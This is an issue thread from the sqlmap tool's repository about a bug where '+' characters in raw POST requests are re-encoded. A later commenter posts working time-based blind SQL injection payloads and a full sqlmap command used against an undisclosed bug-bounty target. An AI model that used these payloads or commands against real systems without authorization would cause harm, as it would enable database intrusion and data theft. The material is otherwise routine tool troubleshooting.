### ISSUE TITLE
Encoding issue when parsing raw POST request from file

### ISSUE THREAD

**Issue by antisnatchor** [sqlmapproject/sqlmap#360]
Hey guys,

I've noticed an encoding issue when parsing a raw POST request from file.
If the body contains the + character (x-www-form-urlencoded), which is the equivalent of %20 (space), SQLmap is replacing that with %20.

Now, if you want to URL encode the + symbol, the encoded value is %2B, not %20.

Finally, you shouldn't parse/replace + characters in a raw POST request, because they are just fine. 

![sqlmap-bottom](https://f.cloud.github.com/assets/910293/80183/16353cbc-622a-11e2-93a7-428d410df046.png)

See attached image (Burp Comparer). Left you have the request sent by SQLmap after parsing the raw request, and right the original raw request which was exported to file and given in input to SQLmap.

I believe this is an issue with raw input files only, everything works smoothly when calling SQLmap from command line with --data.

**Comment by adon90** [comment]
So how to change the spaces by %2b ??

**Comment by stamparm** [comment]
@adon90 sqlmap will automatically use `+` for spaces inside the POST data if it recognizes inside the provided `--data`:

![1](https://user-images.githubusercontent.com/921555/107208244-a0c97180-6a01-11eb-942f-b943cf5fde4e.png)

**Comment by adon90** [comment]
Thank you for your quick response =)

I would like to show you the casuistic and maybe you can tell me why I can't exploit the vulnerability, I can't tell you the website because is a private bounty, but the thing is:

This 2 payload works:

```
1234'%20RLIKE%20SLEEP(20)%20AND%20'lokN'='lokN

1234'%2b(select*from(select(sleep(25)))a)%2b'
```

This doesn't work:

```
1234'+(select*from(select(sleep(25)))a)+'
1234'%20(select*from(select(sleep(25)))a)%20'
```

The first approach I have taken is to use this tamper: --tamper=space2plus.py because I have seen in the request the character space being encoded as %20, but I couldn't exploit it.

The second approach I have taken is trying to try to perform the attack with the payload `1234'%20RLIKE%20SLEEP(20)%20AND%20'lokN'='lokN` by putting in it here: `/usr/share/sqlmap/data/xml/payloads/time_blind.xml`

But I didn't get it to work, do you know how could I do it?

My command is: 
```sqlmap --skip-waf --random-agent -r sqli --level 5 --risk 3 --dbms=mysql --force-ssl --technique=T --tamper=space2plus.py  --batch --current-db --flush```

I really appreciate your help!

**Comment by adon90** [comment]
for example, this is something that works with Burp, but cannot exploit with sqlmap:

vulnparameter=1234'%20RLIKE%20SLEEP(5)%20AND%20(select%20substring(@@version,1,1))='5

Regards!
